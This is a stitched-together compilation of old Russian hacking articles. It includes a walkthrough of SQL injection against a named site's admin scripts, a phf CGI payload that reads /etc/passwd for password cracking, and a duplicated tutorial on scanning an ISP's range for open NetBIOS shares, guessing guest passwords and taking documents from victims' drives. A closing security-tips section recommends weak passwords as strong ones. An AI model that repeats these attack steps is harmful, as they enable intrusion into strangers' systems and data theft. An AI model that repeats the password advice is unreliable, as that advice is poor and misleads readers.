а под картинкой интересная форма, с кнопочкой "Логин". Как я не
пытался угадать пароль, скрипт не поддался. Однако потом, до меня
дошли сведения, что каждый модуль этой системы находиться в своем
файле, и вызывается этот модуль не из оного скрипта, а загружаясь
отдельно. Также мне стало известно, что в этой системе существует
модуль, который генерирует страницу для распечатки каких-то данных,
таким образом, можно предположить, что система имеет файл, корень
названия которого "print". Попробывав ввести адрес
http://www.hasher.ru/sale/admin/print.php, я получил страницу, с
характерной ошибкой:
"Warning: mysql_num_rows(): supplied argument is not a valid MySQL
result resource in
/usr/home/hasher/public_html/www.hasher.ru/sale/admin/print.php
on line 18" - она говорит нам про какую-то ошибку при работе с
MySQL. Но... увы :(, это нам ничего не дает, как ни крути...
Но! Попробуем открыть хтмл-код главной страницы, той, где нас
просили ввести лоигн. Мы видим весьма интересный ява-скрипт,
понятно, что на существующей странице, то есть на странице, кторая
еще не сгенерирована, ибо не введен валидный логин, этот код нигде
не используется. Получается, что мы, как бы приоткрыли часть кода
главной страницы атакуемой системы. Итак, что же мы видим в этом
скрипте:
function toprint(obj)
{
var a = (obj.id.value);
var b = (forme.sss.value);
var p = (forma.pr.value);
var n1 = Number(fnum.num.value);
var n2 = n1+1;
var d = ",";
var q = "id = ";
var z = " or ";
var c = a+d+b;
var topr = p+q+a+z;
fnum.num.value = n2;
forma.pr.value = topr;
formb.mail1.value = topr;
formc.mail2.value = topr;
formd.del.value = topr;
formf.saving.value = topr;
formg.edit.value = topr;
forme.sss.value = c;
}
Сразу затрагивает внимание эта операция: var topr = p+q+a+z;.
Она интересна потому что почти всем остальным объектам этой
страницы присваивается результат этой операции. Итак, мы видим,
что в этой операции объявляется переменная "topr", которая
собирается из некоторых кусочков (p, q, a и z). Итак, переменная
"р", она у нас берется из value какого-то объекта страницы, можно
предположить, что это объект input. Затем переменная "q", она
равна строке "id = ". Переменная "а", она равна id, обекта, по которому
случается событие, то есть если это ,
то "а" будет равно 666. И, наконец переменная "z", она равна строке
" or ". Очень настораживают переменные q и z, строки, содержащиеся
в них, очень напоминают mysql-запрос. Теперь посмотрим, что дальше происходит
с переменной "р": в ее объект записывается результат topr, то есть "р"
у нас как бы в "круговороте". Теперь попробуем прикинуть, каким будет topr,
если в него подставить свои данные: topr="id = 3 or ", это при условии, что
переменная "р" пустая, то бишь после первого вызова функции. Итак, все это
хозяйство очень напоминает mysql-запрос, также мы знаем, что он (запрос)
записывается в value объекта pr, то бишь, запрос передается в переменной pr.
Теперь вспомним про ошибку, которую нам выдавал файл print.php, понятно, что
скрипт ругался на отсутвие или не валидность mysql-запроса. Теперь предположим,
что наша переменная pr передается методом GET, тогда пробуем передать
срипту print.php нашу переменную:
"http://www.hasher.ru/sale/admin/print.php?pr=id = 3 or",
видим, что ошибка пропала, ))) значит мы где-то рядом, теперь попробуем вместо
3, поставить другую цифру, например, 6, и что мы видим :)))? *(скрипт выдал нам
страницу, для печати данных о пользователе 6)
Вот, в принципе, и все, сам я было на этом остановился, но... потом до меня дошло,
что "pr" чем-то похоже на "print". Отсюда следует, что также существуют
файлы, названия которых похожи на другие объекты страницы. Для примера возьмем
formf.saving.value, попробывав "побрутить" название файла вручную, находим,
что существует файл save.php, он также имеет такую же ошибку, что и print.php.
Сдесь все также, как и с print.php, отличие только в том, что скрипт получает
переменную saving, теперь попробывав передать переменную saving с тем же
запросом, что и для print.php, мы увидим, что скрипт поддался, и даже выдал нам
больше информации, чем в первом примере. А теперь попробуем ввести то же самое,
только без " or " :)) *(скрипт выдает всю таблицу).
Вот и все. На этом взлом окончен, во всяком случае я, больше ничего не нашел,
может тебе повезет больше...
© Franklin
как стать хакером за 15 минут
Внимание! Этот материал, как и все остальные, создан для того, чтобы показать обленившимся администраторам WEB-серверов на самые распространенные дырки, которые им лень заткнуть (хоть это и их прямая обязанность). И именно из-за их лени любой человек за 15 минут может сломать их сервер. Ты не умеешь кататься на роликах - последняя попытка окончилась тем, что ты сломал обе ноги о слишком высокий парапет. Ты не умеешь писать программы - твоя первая и последняя программа, написанная на Нортон Коммандере, убила тебе материнскую плату и спалила монитор. Ты не разбираешься в музыке - по-прежнему думаешь, что Мэрилин Мэнсон это участница группы Spice Girls? И Родригеса ты знаешь только потому, что он будет жить еще долго? Из всего этого следует, что тебе катастрофически не дают. Обидно, но это легко исправить - стань хакером. Тебе понадобится IRC-клиент (бери любой, тебе там надо выполнить только пару команд), а также на ftp.technotronic.com в разделе "rhino9-products" возьми программульку под названием Grinder - он ищет указанный тобой файл в диапазоне IP и показывает права на него. Также нужен подбиратель юниксовских паролей John the Ripper (любой поисковик даст тебе миллиард ссылок на него). А в квадратных скобках я буду указывать, что надо писать. Что же будем ломать? Систему того придурка, который, получая зарплату за защиту сервера, ни хрена для этой самой защиты не делает. Читай внимательно и учи - этот абзац ты будешь впаривать девушкам на вечеринках. Есть такое понятие - cgi-скрипты, зачем они нужны и как они устроены, слишком долго объяснять и совсем не обязательно. И одна из самых первых ошибок, обнаруженных в этих скриптах, был т.н. phf bug, ошибка скрипта phf, позволяющая выполнять удаленному юзеру любые юниксовские команды на web-сервере. Ошибка была найдена еще в 96 году, но, не поверишь, до сих пор хватает серверов, которые про нее не слышали! Что ж, есть старая русская пословица - "Гром не грянет - мужик не перекрестится". Запускай IRC-клиент и коннектись к любому серверу (только не вздумай делать то, для чего IRC и был создан - для болтовни, иначе на эту самую болтовню уйдет остаток твоих дней и денег на счету).Самая плохая защита всегда на больших университетский серверах, там годами не обновляется программное обеспечение, а админы настолько обпились пива, что просто забыли о том, что баги надо хоть иногда фиксить. Поэтому смело вводи команду [/who *.edu]. Перед тобой список юзеров, использующих университетский сервер для выхода в Интернет. ОК, бери любого попавшегося (лучше первого) юзера, например, Jagaast 666@jagaast.jj.rhno.columbia.edu:2 Jagaast Iz'Merl (*). Юзер Jagaast пока не знает, что именно он будет Павликом Морозовым, но, думаю, он так и умрет в неведении. Следующая команда - [/dns Jagaast]. Этим ты узнаешь его IP (например, 194.52.14.102 ). Теперь запускай Grinder, он предлагает тебе поискать файл /index.htm[r1]. Зачем нам этот файл? Стираем на фиг и вместо него пишем [/cgi-bin / phf.cgi] и диапазон IP от 194.52.14.1 до 194.52.14.256 (для тех, кто в танке - это диапазон, в который попадает наш Jagaast). Ждем... Есть два варианта. Первый: Grinder пишет URL found. Второй - все остальное. Угадай, какой вариант более благоприятен? Вот, если found, запоминаем (записываем адрес, где он был found (например, 194.52.14.25)) и мчимся к броузеру. В окошке броузера стирай свою любимую надпись [http://content.mail.ru/My%20Downloads/???¦?€?¦ /Xakep/hack5/tppmsgs/msgs0.htm#40 [http://content.mail.ru/My%20Downloads/СЦшЦ /Xakep/hack5/tppmsgs/msgs0.htm#41? Qalias=%ff/bin/cat%20/etc/passwd]. О Боже, что это?!! Файл passwd прямо в окне твоего броузера! Это все, что тебе надо, сохраняй его и суй прямо в руки старику John'у (который The Ripper). Прочитав , ты разберешься, чего там делать, это не так сложно.
Взлом удалённого компьютера через интернет
Постараюсь объяснить как это сделать так сказать "на пальцах", насколько у меня это получится - не знаю поскольку все это постигал сам... Прежде всего мой совет:
1. Установите на свой компьютер Windows 2k
2. Скачайте и установите на свой компьютер сканер Essential Net Tools v3.0
3. Скачайте и установите на свой компьютер HakTek v1.1
4. NEW!!! IMPORTANT!!! Не забывайте включить протокол Net BEUI и Доступ к файлам и принтерам сети Мелкософт!!
5. В Windows 2000 это делается только в свойствах соединения, а в 9х его еще нужно поставить в свойствах сети!
Ну, пожалуй для начала взлома удаленного компьютера этого вполне достаточно. Хотя нет, скачайте с сайта http://www.pysoft.com/ звонилку Advanced Dialer, ну этого должно хватить...
Теперь некоторые объяснения предыдущих действий:
Для чего нам Windows 2k? Да очень просто - по моим наблюдениям все сканеры лучше и корректнее работают под 2000, кроме этого когда вы нашли потенциальную жертву вам нужно изменить вашу рабочую группу на группу установленную на компьютере жертвы в Windows 2000 это делается так: правая кнопка мыши на >Мой компьютер> выбираем >Сетевая идентификация >Свойства, в нижней части там где написано "Является членом:" должна стоять галочка "Рабочей группы" вы пишите нужное вам имя рабочей группы, нажимаете "ОК" и вам высвечивается приветствие "Добро пожаловать в рабочую группу такую-то", вы нажимаете кнопочку "ОК" и вам предлагается перезагрузить компьютер для вступления в силу изменений, в этот момент вы должны не нажать кнопочку "ОК", как ранее, а просто закрыть окошко, теперь вам просто нужно нажать "ОК" на "Свойствах системы" и опять вас предупредят о том что нужно перезагрузить компьютер, на что вы должны категорично ответить "НЕТ". Поздравляю - изменения вступили - таки в силу без всяких там перезагрузок. В этом еще одна изюминка Windows 2000, поскольку в системах "для домохозяек", а именно 9х, Ме изменения вступают только после перезагрузки! А это все время: время на перезагрузку, на подключение к интернет - в результате вполне возможно, что когда вы подключитесь к интернет после перезагрузки жертвы уже там не будет. Экономьте время!!!
Зачем же нам Essential NetTools v3.0? Как было сказано выше - это сканер (более подробное описание вы сможете найти на страничке скачивания), нам же достаточно знать что он позволяет сканировать диапазон IP-адресов на расшаренные ресурсы, и выборочный адрес на шары (расшаренные, шары - ресурсы доступные пользователям рабочей группы, а следовательно и вам!), а также, что тоже немаловажно!, подбирать пароли доступа (не думайте что это такая уж быстрая процедура, но, как правило, в большинстве случаев лица с расшаренными ресурсами - это либо ломаки, либо лица чересчур самоуверенные, либо секретарши на фирмах (кстати почему бы им всем не подумать о безопасности?) у которых пароль подбирается буквально с первой - второй попытки:-))) Кроме того, она позволяет подключать эти самые шары к вашему компьютеру без головной боли (но эта процедура итак не очень утомительная). Ну вроде по этому поводу - все....
HakTek v1.1 - в принципе особой необходимости в этой программе нет, но все-равно рекомендую скачать - мне больше всего нравится Finger Session. Вобщем - читайте описание на страничке скачивания. Зачем нам Advanced Dialer? Вроде бы простая звонилка... Но у нее есть одна хорошая черта. Вы хотите иметь пароли пользователей вашего провайдера? Тогда ставьте Advanced Dialer ибо он при подключении показывает и ваш IP-адрес и, что самое главное, IP-адрес сервера провайдера к которому вы подключены (так же как и многие другие пользователи!!!;-))) - вот это главное!
Ну, предположим, что вы выполнили все рекомендации. Теперь начнем работу на примере кражи документов с диска С компьютера подключенного к тому же провайдеру что и вы:
1. Подключаемся к интернет при помощи Advanced Dialer и смотрим IP-адрес сервера провайдера (как правило он никогда не изменяется, так что смело можете записывать его на бумажку), допустим 194.153.128.132 - реальный IP-адрес провайдера ZEOS
2. Запускаем Essential NetTools v3.0 и выбираем NBScan, там вводим начальный IP-адрес для сканирования "Starting IP adress" (в нашем случае пусть это будет например 194.153.128.0) и конечный IP-адрес "Ending IP adress" (в нашем случае это пусть будет 194.153.128.75, вообще-то конечным должен был бы быть IP 194.153.128.255, но я никогда не видел чтобы кто-то был подключен к адресу более 194.153.128.72, поэтому тратить кучу времени на сканирование еще 180 адресов по-моему просто глупо...
3. После того как процесс сканирования окончен мы увидим примерно следующее:
NAME WORKGROUP RS IP Adress MAC Adress
Legioner Legion666 Yes 194.153.128.15 это нас не интересует
Vovan Workgroup No 194.153.128.19 это нас не интересует
Dmitriy Venera Yes 194.153.128.21 это нас не интересует
Sinelnikov Claus Yes 194.153.128.32 это нас не интересует
Kinder Troja Yes 194.153.128.43 это нас не интересует
Sky Circus Yes 194.153.128.47 это нас не интересует
Trishka Killers No 194.153.128.64 это нас не интересует
Judge Dred No 194.153.128.69 это нас не интересует
4. Мы видим имена, рабочие группы, RS - расшаренные ресурсы, IP-адреса, адреса МАК компьютеров с NetBios Sessions (то есть с открытым 139 - м портом) Кстати не забудьте включить у себя NetBios - иначе ничего не будет, также для личной безопасности сделайте все диски и принтеры локальными (защитите их от чтения и записи). Нам нужны только: рабочая группа, RS, IP-адреса. Если RS - No - об этом компьютере можно сразу забыть. Если же -Yes, то можно попробовать подключится к нему. Для этого:
1. Включаем NAT
2. Вводим адрес IP - например 194.153.128.15 и нажимаем "SCAN"
3. Теперь немного подождем...
Что мы видим:
* Checking 194.153.128.47 ...
* Obtained NetBIOS name table:
SKY
SKY
CIRCUS
SKY
CIRCUS
DAN
CIRCUS
..__MSBROWSE__.
* Trying username "ADMINISTRATOR", password "": failed - начало подбора пароля
* Trying username "ADMINISTRATOR", password "ADMINISTRATOR": failed
* Trying username "ADMINISTRATOR", password "GUEST": failed
* Trying username "ADMINISTRATOR", password "ROOT": failed
* Trying username "ADMINISTRATOR", password "ADMIN": failed
* Trying username "ADMINISTRATOR", password "PASSWORD": failed
* Trying username "ADMINISTRATOR", password "TEMP": failed
* Trying username "ADMINISTRATOR", password "SHARE": failed
* Trying username "ADMINISTRATOR", password "WRITE": failed
* Trying username "ADMINISTRATOR", password "FULL": failed
* Trying username "ADMINISTRATOR", password "BOTH": failed
* Trying username "ADMINISTRATOR", password "READ": failed
* Trying username "ADMINISTRATOR", password "FILES": failed
* Trying username "ADMINISTRATOR", password "DEMO": failed
* Trying username "ADMINISTRATOR", password "TEST": failed
* Trying username "ADMINISTRATOR", password "ACCESS": failed
* Trying username "ADMINISTRATOR", password "USER": failed
* Trying username "ADMINISTRATOR", password "BACKUP": failed
* Trying username "ADMINISTRATOR", password "SYSTEM": failed
* Trying username "ADMINISTRATOR", password "SERVER": failed
* Trying username "ADMINISTRATOR", password "LOCAL": failed
* Trying username "GUEST", password "": failed
* Trying username "GUEST", password "ADMINISTRATOR": failed
* Trying username "GUEST", password "GUEST": succeeded - пароль успешно подобран
* Obtained share list: - список возможных доступных ресурсов
IPC$ Remote IPC
E$ Default share
D$ Default share
C
ADMIN$ Remote Admin
C$ Default share
* Obtained server information:
Server=[SKY] User=[] Workgroup=[SKYGROUP] Domain=[]
* Checking share E$: access denied - доступ запрещен
* Checking share D$: access denied - доступ запрещен
* Checking share C: read-write access - доступ разрешен для чтения-записи
* Checking share ADMIN$: access denied
* Checking share C$: access denied
* Finished checking 194.153.128.47
Ну вот мы и нашли подходящую жертву! Как видно из списка, мы можем подключиться к диску С (разрешен доступ для чтения и записи), то есть мы можем записывать жертве на диск, стирать с его диска, копировать с его диска!
Теперь нам нужно подключить удаленный компьютер. В этом нет ничего сложного. Для этого нам нужно изменить рабочую группу согласно вышеописанному способу. В Essential NetTools открыть NBScan и выделить потенциальную "жертву", в нашем случае это Sky с рабочей группой Circus и IP-адресом 194.153.128.47, нажать правую кнопку мышки и выбрать в контекстном меню "Open computer". В ответ откроется стандартное окно Windows где будет присутствовать диск "С". Наводим на этот самый диск "С" нажимаем правую кнопку мыши и в контекстном меню выбираем "Подключить сетевой диск", когда главный каталог будет считан мы можем начинать "лазить", а точнее сказать "ползать" по диску "С" удаленного компьютера с адресом 194.153.128.47, делать это можно при помощи стандартного "Проводника", Windows Commander и других программ.
1. Установите на свой компьютер Windows 2k
2. Скачайте и установите на свой компьютер сканер Essential Net Tools v3.0
3. Скачайте и установите на свой компьютер HakTek v1.1
4. NEW!!! IMPORTANT!!! Не забывайте включить протокол Net BEUI и Доступ к файлам и принтерам сети Мелкософт!!
5. В Windows 2000 это делается только в свойствах соединения, а в 9х его еще нужно поставить в свойствах сети!
Ну, пожалуй для начала взлома удаленного компьютера этого вполне достаточно. Хотя нет, скачайте с сайта http://www.pysoft.com/ звонилку Advanced Dialer, ну этого должно хватить...
Теперь некоторые объяснения предыдущих действий:
Для чего нам Windows 2k? Да очень просто - по моим наблюдениям все сканеры лучше и корректнее работают под 2000, кроме этого когда вы нашли потенциальную жертву вам нужно изменить вашу рабочую группу на группу установленную на компьютере жертвы в Windows 2000 это делается так: правая кнопка мыши на >Мой компьютер> выбираем >Сетевая идентификация >Свойства, в нижней части там где написано "Является членом:" должна стоять галочка "Рабочей группы" вы пишите нужное вам имя рабочей группы, нажимаете "ОК" и вам высвечивается приветствие "Добро пожаловать в рабочую группу такую-то", вы нажимаете кнопочку "ОК" и вам предлагается перезагрузить компьютер для вступления в силу изменений, в этот момент вы должны не нажать кнопочку "ОК", как ранее, а просто закрыть окошко, теперь вам просто нужно нажать "ОК" на "Свойствах системы" и опять вас предупредят о том что нужно перезагрузить компьютер, на что вы должны категорично ответить "НЕТ". Поздравляю - изменения вступили - таки в силу без всяких там перезагрузок. В этом еще одна изюминка Windows 2000, поскольку в системах "для домохозяек", а именно 9х, Ме изменения вступают только после перезагрузки! А это все время: время на перезагрузку, на подключение к интернет - в результате вполне возможно, что когда вы подключитесь к интернет после перезагрузки жертвы уже там не будет. Экономьте время!!!
Зачем же нам Essential NetTools v3.0? Как было сказано выше - это сканер (более подробное описание вы сможете найти на страничке скачивания), нам же достаточно знать что он позволяет сканировать диапазон IP-адресов на расшаренные ресурсы, и выборочный адрес на шары (расшаренные, шары - ресурсы доступные пользователям рабочей группы, а следовательно и вам!), а также, что тоже немаловажно!, подбирать пароли доступа (не думайте что это такая уж быстрая процедура, но, как правило, в большинстве случаев лица с расшаренными ресурсами - это либо ломаки, либо лица чересчур самоуверенные, либо секретарши на фирмах (кстати почему бы им всем не подумать о безопасности?) у которых пароль подбирается буквально с первой - второй попытки:-))) Кроме того, она позволяет подключать эти самые шары к вашему компьютеру без головной боли (но эта процедура итак не очень утомительная). Ну вроде по этому поводу - все....
HakTek v1.1 - в принципе особой необходимости в этой программе нет, но все-равно рекомендую скачать - мне больше всего нравится Finger Session. Вобщем - читайте описание на страничке скачивания. Зачем нам Advanced Dialer? Вроде бы простая звонилка... Но у нее есть одна хорошая черта. Вы хотите иметь пароли пользователей вашего провайдера? Тогда ставьте Advanced Dialer ибо он при подключении показывает и ваш IP-адрес и, что самое главное, IP-адрес сервера провайдера к которому вы подключены (так же как и многие другие пользователи!!!;-))) - вот это главное!
Ну, предположим, что вы выполнили все рекомендации. Теперь начнем работу на примере кражи документов с диска С компьютера подключенного к тому же провайдеру что и вы:
1. Подключаемся к интернет при помощи Advanced Dialer и смотрим IP-адрес сервера провайдера (как правило он никогда не изменяется, так что смело можете записывать его на бумажку), допустим 194.153.128.132 - реальный IP-адрес провайдера ZEOS
2. Запускаем Essential NetTools v3.0 и выбираем NBScan, там вводим начальный IP-адрес для сканирования "Starting IP adress" (в нашем случае пусть это будет например 194.153.128.0) и конечный IP-адрес "Ending IP adress" (в нашем случае это пусть будет 194.153.128.75, вообще-то конечным должен был бы быть IP 194.153.128.255, но я никогда не видел чтобы кто-то был подключен к адресу более 194.153.128.72, поэтому тратить кучу времени на сканирование еще 180 адресов по-моему просто глупо...
3. После того как процесс сканирования окончен мы увидим примерно следующее:
NAME WORKGROUP RS IP Adress MAC Adress
Legioner Legion666 Yes 194.153.128.15 это нас не интересует
Vovan Workgroup No 194.153.128.19 это нас не интересует
Dmitriy Venera Yes 194.153.128.21 это нас не интересует
Sinelnikov Claus Yes 194.153.128.32 это нас не интересует
Kinder Troja Yes 194.153.128.43 это нас не интересует
Sky Circus Yes 194.153.128.47 это нас не интересует
Trishka Killers No 194.153.128.64 это нас не интересует
Judge Dred No 194.153.128.69 это нас не интересует
4. Мы видим имена, рабочие группы, RS - расшаренные ресурсы, IP-адреса, адреса МАК компьютеров с NetBios Sessions (то есть с открытым 139 - м портом) Кстати не забудьте включить у себя NetBios - иначе ничего не будет, также для личной безопасности сделайте все диски и принтеры локальными (защитите их от чтения и записи). Нам нужны только: рабочая группа, RS, IP-адреса. Если RS - No - об этом компьютере можно сразу забыть. Если же -Yes, то можно попробовать подключится к нему. Для этого:
1. Включаем NAT
2. Вводим адрес IP - например 194.153.128.15 и нажимаем "SCAN"
3. Теперь немного подождем...
Что мы видим:
* Checking 194.153.128.47 ...
* Obtained NetBIOS name table:
SKY
SKY
CIRCUS
SKY
CIRCUS
DAN
CIRCUS
..__MSBROWSE__.
* Trying username "ADMINISTRATOR", password "": failed - начало подбора пароля
* Trying username "ADMINISTRATOR", password "ADMINISTRATOR": failed
* Trying username "ADMINISTRATOR", password "GUEST": failed
* Trying username "ADMINISTRATOR", password "ROOT": failed
* Trying username "ADMINISTRATOR", password "ADMIN": failed
* Trying username "ADMINISTRATOR", password "PASSWORD": failed
* Trying username "ADMINISTRATOR", password "TEMP": failed
* Trying username "ADMINISTRATOR", password "SHARE": failed
* Trying username "ADMINISTRATOR", password "WRITE": failed
* Trying username "ADMINISTRATOR", password "FULL": failed
* Trying username "ADMINISTRATOR", password "BOTH": failed
* Trying username "ADMINISTRATOR", password "READ": failed
* Trying username "ADMINISTRATOR", password "FILES": failed
* Trying username "ADMINISTRATOR", password "DEMO": failed
* Trying username "ADMINISTRATOR", password "TEST": failed
* Trying username "ADMINISTRATOR", password "ACCESS": failed
* Trying username "ADMINISTRATOR", password "USER": failed
* Trying username "ADMINISTRATOR", password "BACKUP": failed
* Trying username "ADMINISTRATOR", password "SYSTEM": failed
* Trying username "ADMINISTRATOR", password "SERVER": failed
* Trying username "ADMINISTRATOR", password "LOCAL": failed
* Trying username "GUEST", password "": failed
* Trying username "GUEST", password "ADMINISTRATOR": failed
* Trying username "GUEST", password "GUEST": succeeded - пароль успешно подобран
* Obtained share list: - список возможных доступных ресурсов
IPC$ Remote IPC
E$ Default share
D$ Default share
C
ADMIN$ Remote Admin
C$ Default share
* Obtained server information:
Server=[SKY] User=[] Workgroup=[SKYGROUP] Domain=[]
* Checking share E$: access denied - доступ запрещен
* Checking share D$: access denied - доступ запрещен
* Checking share C: read-write access - доступ разрешен для чтения-записи
* Checking share ADMIN$: access denied
* Checking share C$: access denied
* Finished checking 194.153.128.47
Ну вот мы и нашли подходящую жертву! Как видно из списка, мы можем подключиться к диску С (разрешен доступ для чтения и записи), то есть мы можем записывать жертве на диск, стирать с его диска, копировать с его диска!
Теперь нам нужно подключить удаленный компьютер. В этом нет ничего сложного. Для этого нам нужно изменить рабочую группу согласно вышеописанному способу. В Essential NetTools открыть NBScan и выделить потенциальную "жертву", в нашем случае это Sky с рабочей группой Circus и IP-адресом 194.153.128.47, нажать правую кнопку мышки и выбрать в контекстном меню "Open computer". В ответ откроется стандартное окно Windows где будет присутствовать диск "С". Наводим на этот самый диск "С" нажимаем правую кнопку мыши и в контекстном меню выбираем "Подключить сетевой диск", когда главный каталог будет считан мы можем начинать "лазить", а точнее сказать "ползать" по диску "С" удаленного компьютера с адресом 194.153.128.47, делать это можно при помощи стандартного "Проводника", Windows Commander и других программ.
ВЗЛОМ БАНКОВСКИХ СИСТЕМ
ВЗЛОМ БАНКОВСКИХ СИСТЕМ
Экзамены никогда не кончаются
Когда нанятым хакерам удалось взломать систему, ваша работа только начинается. Ни в коем случае не следует считать, что сам факт тестирования уже обеспечивает информационную безопасность. Оценка системы безопасности (вроде той, что мы предприняли по заказу BABank) дает только представление о состоянии сети на момент проведения операции. Cистема информационной безопасности претерпевает постоянные изменения и требует к себе постоянного внимания.
Первый всеобъемлющий тест должен рассматриваться вами как отправная точка. Не забывайте время от времени выделять деньги на повторные обследования. Не менее важно и то, чтобы исследования проводились до запуска онлайновых услуг, а не после того, как "дыры" в защите дадут себя знать.
Не забывайте девиз "Взломай свою систему сам, пока кто-то не сделает этого без твоего ведома". А пока - удачной охоты!
Десять советов по защите серверов для Web-коммерции
1. Следует ограничить число людей, имеющих удаленный доступ к управлению вашим Web-сервером, и тщательно следить за этим доступом. Дистанционное администрирование (как и доступ к корневому каталогу) - отличная лазейка для хакера.
2. Проверьте, правильно ли сконфигурированы списки доступа и вносятся ли в них каждодневные изменения, отражающие состояние деловой жизни компании (такие, например, как добавление новых пользователей и клиентов, удаление старых ).
3. Насколько возможно, отделите ваш коммерческий сервер от прочих услуг. Можно дополнительно укрепить сервер, отменив все необязательные функции приложений и операционных систем. Если вы не в состоянии этого сделать, следует всерьез подумать об использовании сторонних услуг (outsourcing).
4. Установите систему обнаружения вторжений, которая немедленно будет ставить в известность администратора сети обо всех проблемах, требующих устранения. Помните, что обнаружить хакера - это полдела; главная задача состоит в пресечении его деятельности.
5. Система должна реагировать на любые необычные события, происходящие на серверах. Невозможно остановить злоумышленника, не зная, что он делает.
6. Неправильно написанные, сконфигурированные и установленные скрипты Perl и CGI (Common Gateway Interface) могут стать причиной возникновения "дыр" в системе защиты. Этими средствами надо пользоваться осторожно; все скрипты должны проверяться опытными специалистами.
7. Для обеспечения безопасности некоторых коммерческих серверов использования паролей недостаточно. Стоит обдумать возможность раздачи клиентам физических и электронных жетонов (они стоят примерно 50 дол. за штуку).
8. Следует обеспечивать и аутентификацию администраторов. Все большее распространение получают различные биометрические средства идентификации по голосу, отпечаткам пальцев и узору сетчатки (они стоят примерно по 300 дол. в расчете на одного пользователя).
9. При переводе денежных сумм (с использованием кредитных карточек или путем обращения к мэйнфрейму, где поддерживаются полномасштабные банковские операции) ваш узел обращается к другим сетям. При взаимодействии с критически важными системами следует применять такие средства обеспечения безопасности, как Secure Socket Layer, Secure Hypertext Transfer Protocol или Kerberos.
10. Подумайте, не стоит ли снабдить критически важные данные и соответствующие им системные файлы оболочками для обеспечения их целостности. Криптографические оболочки вокруг этих файлов позволят не допустить их модификации или внесения вредоносного кода.
Как работать с группой, оценивающей надежность системы информационной безопасности
Выберите себе консультанта с хорошей репутацией Потребуйте, чтобы в группе велись подробные контрольные журналы в течение всего срока работ Необходимо, чтобы группа оценки могла приостановить свою деятельность за несколько минут, если начнет происходить нечто нежелательное Группа должна выдать несколько различных отчетов, рассчитанных на технических специалистов, руководителей среднего звена и высшее руководство компаний Ознакомьтесь с результатами проверки и используйте их как руководство к действию
Десять недорогих способов укрепления системы обеспечения внутренней безопасности
1. Стоит выяснить о нанимаемых на работу людях несколько больше, чем можно узнать из их резюме; особенно это касается таких критически важных должностей, как системный администратор. Подумайте, не надо ли ввести систему психотестов, которые позволят выявить этические принципы кандидатов, их особенности.
2. Рассмотрите вопрос о снятии дисководов с пользовательских ПК. Это затруднит сотрудникам установку своего собственного программного обеспечения и компьютерных игр, помешает им заражать систему вирусами и "выносить" из компании закрытую информацию. Такая мера позволит избежать и еще одной угрозы для информационной безопасности - диски, разбросанные на столе сотрудника, легко могут пропасть.
3. Не допускайте, чтобы на одну сетевую станцию приходилось более одного идентификатора пользователя. Установите безопасные экранные заставки - это поможет решить административные проблемы.
4. Предоставляйте корневые привилегии только тем администраторам, которым они реально нужны. Помните, что каждый раз, когда вы даете такие привилегии, в системе защиты появляется еще одна потенциальная "дырка".
5. Уничтожайте или сжигайте важную закрытую информацию: списки персонала, идентификационные имена сотрудников, сводки отдела кадров, папки с данными о клиентах, памятки, руководства, схемы сетей и вообще все, что может представлять интерес для злоумышленников.
6. Мусорные контейнеры должны находиться на территории организации; в противном случае злоумышленник не устоит перед соблазном в них порыться.
7. Постарайтесь, чтобы сотрудники компании стали вашими союзниками в борьбе за корпоративную безопасность. Попробуйте реализовать программы партнерства: пообещайте вознаграждение тому, кто обнаружит недочеты в системе безопасности или уличит кого-либо в недобросовестности.
8. Внимательно изучайте все продукты, обеспечивающие информационную безопасность. Убедитесь, что они работают именно так, как было обещано производителем. Подумайте, можно ли укрепить систему защиты, не устанавливая новый продукт, который потребует от вас определенных усилий.
9. Уполномочьте кого-либо из сотрудников принимать оперативные меры в случае угрозы информационной безопасности - от аварийной остановки Web-сервера до вызова охраны для удаления проштрафившегося сотрудника за пределы организации.
10. Оповестите сотрудников, что вы используете самые современные средства мониторинга сети и контроля за действиями работников компании. Объясните, что вы не собираетесь устанавливать тоталитарный режим, а просто боретесь со злоумышленниками. В результате, сотрудники будут с меньшей легкостью нарушать правила пользования информационной системой и обеспечения защиты данных.
Пять основных условий обеспечения информационной безопасности
1. Главное, что нужно сделать для защиты информационной системы от внешних и внутренних угроз, - выработать корпоративную политику. Обдумайте, чего вы хотите добиться и как можно достичь поставленной цели; составьте ясный документ, посвященный политике защиты.
2. Регулярно проводите занятия с сотрудниками, повышая их образовательный уровень и степень информированности обо всех аспектах информационной безопасности компании. Объясняйте сотрудникам, в чем могло бы состоять их участие в обеспечении информационной безопасности компании.
3. Периодически проводите тестирование и оценку системы защиты, чтобы проверить, насколько внешняя и внутренняя защита соответствует корпоративной политике. Работайте только с теми консультантами, которые придерживаются структурированного подхода и не заинтересованы напрямую в результатах тестирования.
4. Не забывайте о простых способах физической защиты. Следите за доступом к распределительным шкафам, серверам, комнатам телефонной связи и кроссам точно так же, как вы следите за доступом к вычислительным центрам.
5. Рассмотрите вопрос об использовании услуг сторонних компаний, специализирующихся в области защиты данных; они должны работать в контакте с отделом автоматизации. Эти компании могут оказаться лучше подготовленными к тому, чтобы следить за защитой ваших данных 24 часа в сутки без выходных. Однако тогда вам придется передать в чужие руки управление определенной частью своего бизнеса.
Десять способов поддержки работоспособности системы защиты
1. Время от времени проводите тестирование систем защиты - это позволит отслеживать все изменения в самих системах, сетях и поведении пользователей. Точечные проверки системы защиты данных предприятия стоит проводить ежемесячно, а полную проверку информационной безопасности предприятия - раз в год. Возможное влияние новых приложений на информационную безопасность следует оценивать перед их установкой.
2. Постоянно проверяйте надежность парольной защиты, даже если ничто не внушает беспокойства. Длинные пароли лучше коротких, поскольку их труднее подобрать, однако их и труднее запомнить, не записывая. Вот примеры хороших паролей: PaSsWoRd (чередующиеся прописные и строчные буквы), ford6632 (распространенное слово и легко запоминающееся число), 3lite, wr1t3m3, w1nn13 (так пишут хакеры).
3. Следите за тем, как ваши пользователи работают с Internet, и регулируйте этот процесс.
4. В рамках программы непрерывного образования предложите сотрудникам ознакомиться со специальными играми и моделирующими программами, которые позволят им осознать, какие последствия может иметь пренебрежение правилами защиты данных.
5. За счет использования механизмов управления доступом и технологий для интрасетей разделите вашу организацию на логические части. Секционирование ресурсов и информации повышает степень защищенности. Подумайте также об использовании закрытой почтовой системы, ограничивающей возможность обмена информацией между сотрудниками.
